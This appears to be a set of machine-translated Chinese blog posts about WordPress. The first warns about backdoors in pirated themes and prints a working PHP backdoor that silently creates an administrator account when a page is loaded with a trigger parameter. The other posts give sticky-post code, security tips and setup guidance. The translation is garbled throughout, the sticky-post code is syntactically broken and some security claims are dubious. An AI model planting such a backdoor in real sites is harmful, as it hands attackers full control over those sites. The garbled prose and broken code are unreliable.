Be careful! Pirate theme may have a back door

WordPress In addition to a large number of official themes, there are a large number of theme designers to publish free and charge topics, many children’s shoes often collect the theme to get back to use the test, some of which will be collected by foreign experts to fill the theme of commercial changes, add Dark chain, advertising, and even malicious code, and then free or paid public release, to induce others to download and use, to achieve ulterior motives. In addition, these commercial charges are generally the subject of the test version, the subject code is not perfect, the function is missing, individual test version of the commercial theme is enabled after the database will automatically write a lot of data …….

The following code is more evil and can automatically add a role for the admin user.

  1. add_action(‘wp_head’, ‘holeinthewall’);
  2. function holeinthewall() {
  3.         If ($_GET[‘backdoor’] == ‘go’) {
  4. require(‘wp-includes/registration.php’);
  5.                 If (!username_exists(‘username’)) {
  6. $user_id = wp_create_user(‘username’, ‘password’);
  7. $user = new WP_User($user_id);
  8. $user->set_role(‘administrator’);
  9.                 }
  10.         }
  11. }

Add the code to your current theme functions.php file or plugin, will automatically create a user name: username password: password administrator who have the authority, then want to do anything.

So, here advise you still do not use their own site pirated themes and plug-ins, as far as possible to the official or original publishing site to download the theme, so as not to be opened the back door is not known!

WordPress calls the sticker article code

Today, when doing wordpress theme, just to use the call of the top articles. Here to share with you WordPress how to add the top articles.


Add a sticker article:

1, we can see the current editor of the article on the right side of a public degree: release editor, click on the editor, check the “Zhiding this article to the home page”, then open the blog you can see the top of the state.

2, when the article was released, then we can click the blog background menu menu under the “Edit” option, enter the article list, the mouse moved to the need to stick the article, under the title of the article will show “edit”, “fast Edit “,” Delete “,” View “four options, click the” Quick Edit “option

3, in the quick editing, you can edit the title, label, alias, classification and other operations, at the same time here can also be the top of the operation of the article, in the “keep this article Zhiding” in front of the small box tick, and then click to update the article , Then the article on the blog home to keep the top state.

4, update the article, open the blog home page will find the state of the top of the article


Call WordPress Top Articles List:

In the need to call WordPress Zhiding articles directly add the following code:

  1. <?php
  2. $sticky = get_option(‘sticky_posts’);
  3. rsort( $sticky );
  4. $sticky = array_slice$sticky, 0, 5);
  5. query_posts( array( ‘post__in’ => $sticky, ‘caller_get_posts’ => 1 ) );
  6. if (have_posts()) :
  7. while (have_posts()) : the_post();
  8. ?>
  9. here is the content want to show
  10. <?php endwhileendif; ?>


Please modify the required place according to the actual code. When there is no sticked article, the latest five articles.

Top 10 WordPress security settings tips

WordPress is currently used in the world of a wide range of blog software, more vulnerable to various attacks, so WordPress security is also very important, there are 10 security tips below that can help you easily solve WordPress security issues so that you are in WordPress Safety to go more detours.

1, upgrade WordPress to the latest version

In general, the new version of WordPress security will be better than the old version, and solve the known various security issues, especially when a major version of the upgrade, the new version may solve more critical issues The (For example, older versions of WordPress have remv.php major vulnerabilities that could lead to DDoS attacks and upgrade to the latest version to fix this problem)


2, hidden version of WordPress

Edit your header.php template, which will be on the version of WordPress information are deleted, so that hackers can not see through the source code control that your WordPress has not upgraded to the latest version.


3. Change the WordPress username

Every hacker knows that WordPress’s admin user is admin, has administrator privileges, will attack this user, then you need to create a new user, set it as administrator privileges, and then delete the old admin account, which can be avoided Hackers guess the administrator’s username.


4, change the WordPress user password

After installing WordPress, the system will send a random password to your mailbox, modify the password, because the length of the password is only 6 characters, you want to change the password to 10 characters above the complex password, and try to use letters, numbers , The symbol is mixed with the password.


5, to prevent the WordPress directory display

WordPress will install the plugin by default to the / wp-content / plugins / directory. Normally, browsing this directory directly will list all installed plugin names, which is bad because hackers can exploit vulnerabilities in known plugins so that they can Create an empty index.html file into this directory, of course, modify the Apache .htaccess file can also play the same role.


6, protect the wp-admin folder

You can protect the WordPress administrator folder by restricting the IP address, and all other IP address accesses the information that is forbidden to access, but you can only manage blogs from one or two places. In addition, you need to put a new .htaccess file to the wp-admin directory, to prevent the root directory. Htaccess file is replaced.


7, for the protection of search engines

Many WordPress system files do not need to be indexed by the search engine, so modify your robots.txt file to add a line to Disallow: / wp- *


8, install the Login Lockdown plugin

This plug-in can record the failed login attempt IP address and time, if the IP address from a failure to log in more than a certain condition, then the system will prohibit this IP address to continue to try to log on.

9, WordPress database security

The data table is best not to use the default wp_ at the beginning, the installation of the database backup plug-in, no matter how much protection, you should regularly back up your database, the use of WordPress Database Backup plug-ins can achieve regular backup database.


10, install WordPress Security Scan plugin

This plugin will automatically follow the above security recommendations for your WordPress scan, find the existence of the problem, the use of more simple.

Novice advanced: how to use WordPress?

If you are the first contact with WordPress and I do not know where to start, beard hope to help you! There is an extremely simple introductory guide to help you get started with WordPress. Keep in mind that if you need more help, you can get help in a variety of ways in this document. Welcome to the WordPress family!
First of all, we have some preparation to do:
1. Check the website server is compatible with the new version of WordPress
Version 2.9 WordPress Server Requirements:

  • PHP 4.3 or later
  • MySQL 4.1.2 or later
  • (Optional) Apache mod_rewrite module (used as a plain link Permalinks we know)

Version 2.5, 2.6, 2.7, 2.8 WordPress Server Requirements:

  • PHP 4.3 or later
  • MySQL 4.0 or later
  • (Optional) Apache mod_rewrite module (used as a plain link Permalinks we know)

2. On the server MySQL database to add a new database, get the database user name, database name, database password

3. Develop a plan about how you plan to use WordPress on your website

  • Do you plan to install WordPress into the site root directory, subdirectory, or do you just want to make a test site to make sure you want to use WordPress?
  • Did you make a list of your website categories? You can only know that WordPress can only sort by category name and ID alphabetical order (can be managed by background menu> sorting items), so if your classification Categories are important to you, start making your Categories Categories List.
  • Did you make a list of the zh-cn: page you want to add to your site? For example, About , Contact, Event

Install WordPress

1. To WordPress official website to download a WordPress program, you can choose the English or Chinese version.
WordPress English version of WordPress Chinese version
2. Extract the downloaded file, copy all the files to the root directory of the site (or use FTP to the site)
3. In the browser, enter your own domain name, automatically prompted to start the installation. Point “next step” as required to enter the database name, user, password, follow the prompts to complete the installation.
4. Installation is complete, remember the system generated by the random password, login background change this hard to remember the password.

Get started with WordPress

After the installation is complete, you should set up WordPress so that it works in the way you want. When you change the settings, it is recommended that you see how these changes affect your site by clicking the View Site link at the top of the Admin option. You may choose to do the following steps in any order, but if you follow the steps below, it will be easier to configure your site:

Manage your blog

  • User> your user profile – set the user information you want to post on your site
  • Your user profile> author and user – add the author and user who will use your site if applicable
  • Settings> General – Set your site name and other information
  • Settings> Write – set your options for writing articles
  • Settings> read – set the number of articles to display on the home page, the catalog and your feed
  • Settings> Comments – enable or disable commenting and how to handle them
  • Articles> Categories – Add some new categories to your original category list
  • Articles> Editors – When you have finished writing some of the articles, it will be where you can manage them by editing and deleting them
  • Appearance> theme – change the appearance of your site?
  • Settings> Page – Add a new [[en: page | page]], or two pages like “About me” or “Contact me”
  • Article> add a new article – start adding content to your site
  • Write an article – step by step to write an article

HTTP 500 error with WordPress

HTTP 500 error is a very common internal server error, there are many such errors, here only in WordPress inside the more common HTTP 500 error.
We use the WordPress plug-in when they will encounter such a problem, because the plug-in version and we use WordPress conflict, solve this problem as long as the plug-in can be disabled.
We will be in the upgrade WordPress time will encounter such a situation, when you put the new version of WordPress program files uploaded to the server to overwrite the original old WordPress program files (or you will be the old version of WordPress database into the new version of WordPress database) You will visit the site will appear HTTP 500 error, the website can not visit how to do? There are two main cases of such errors:
1. The PHP program in your topic is not compatible with the new version of the WordPress program. To resolve this error, you first need to use the FTP tool to rename the topic you are using on your site before attempting to visit the site.
2. is due to a plug-in and the new version of the WordPress program is not compatible, to solve this error as long as the FTP tool to delete all the plugins on the site, and then log on the site to try to install a plug-in, find the problem plug-in.

How do I use WordPress to build a website?

WordPress runtime environment
WordPress is based on PHP + MySQL, so WordPress has a basic requirement for hosts: host PHP version 4.3 or higher, MySQL database version 4.0 or higher. In addition, the host is best to support URL rewriting (mod_rewrite) function, so that you can customize Permalinks, easy to search the search and the use of the user.
(Tips: buy WordPress host space when the best choice based on Linux system with URL rewriting (mod_rewrite) function of the host space, it is best not to buy Windows-based system host space.)

WordPress theme installation
WordPress theme installation is very simple, from the Internet to download the theme package after extracting, copy the entire theme directory to WordPress “wp-contentthemes” directory. Then go to WordPress background – look – right inside find the theme you just added Click to enable.

WordPress plugin installed
WordPress plugin installation is also very simple, and the installation theme is similar. From the Internet to download the plug-in package after the extract, copy the entire plug-in directory to WordPress “wp-contentplugins” directory. Then go to WordPress backstage – plugin – right side inside to find the plugin you just click to click to enable.

What can we do with WordPress?
1. Publish, classify, and archive articles.
2. Supports articles, comments, categorization and other forms of RSS output, as well as comments on the set of layers.
3. Provide links to the addition, classification function.
4. Support comments management, anti-spam features (need to enable WordPress comes with plug-ins akismet, or download other anti-spam comments plug-in).
5. Support for direct editing and modification of style (CSS) and program itself (PHP).
6. In the article content, classification, you can also customize the need to add the required page.
7. Modify the theme PHP function, make your blog more personalized.
8. Generate a static html page (requires URL rewriting mod_rewrite support).
9. By adding plug-ins, can provide a variety of special features.
10. Support Trackback and pingback (this is the bridge between the station and the station).
11. Support for some other blog software, platform data import function.
12. Support multi-user (multiple authors work together to create a blog).
And so on … super multi-functional … beard is not a narrative …

What is WordPress?

WordPress is a blog platform developed using PHP language, users can support PHP and MySQL database server to set up their own website. WordPress can also be used as a content management system (CMS) to use. WordPress is a free open source project licensed under the GNU General Public License. WordPress is one of the world’s best free personal blogs, with downloads breaking 8,890,000 (see WordPress Download Counter for detailed data).

WordPress is a personal information publishing platform that focuses on aesthetics, ease of use and web standards. WordPress is a free open source software, but its value can not be measured by money.

WordPress can be used to build a powerful network information publishing platform, but more is used in personalized blog. For blog applications, WordPress allows you to worry about the background technology, focus on doing the contents of the site.

WordPress Features

1. Visual article editor
2. Easy to use template system
3. Unified link management function
4. PermaLink system optimized for search engines
5. Support the use of expansion of its function plug-ins, plug-in is very rich
6. For the article can be nested classification, the same article can also belong to multiple categories
7.TrackBack and Pingback functions
8. Can produce the appropriate text format and style of the layout filter
9. Generate and use functions of static pages
10. Many authors write the function
11. You can save a list of users who have visited your blog
12. Access to users from a certain IP segment can be disabled
13. Support the use of labels (Tags)